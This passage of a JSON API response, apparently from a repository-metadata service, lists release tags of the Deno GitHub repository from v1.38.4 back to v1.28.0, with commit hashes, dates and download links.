_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https:/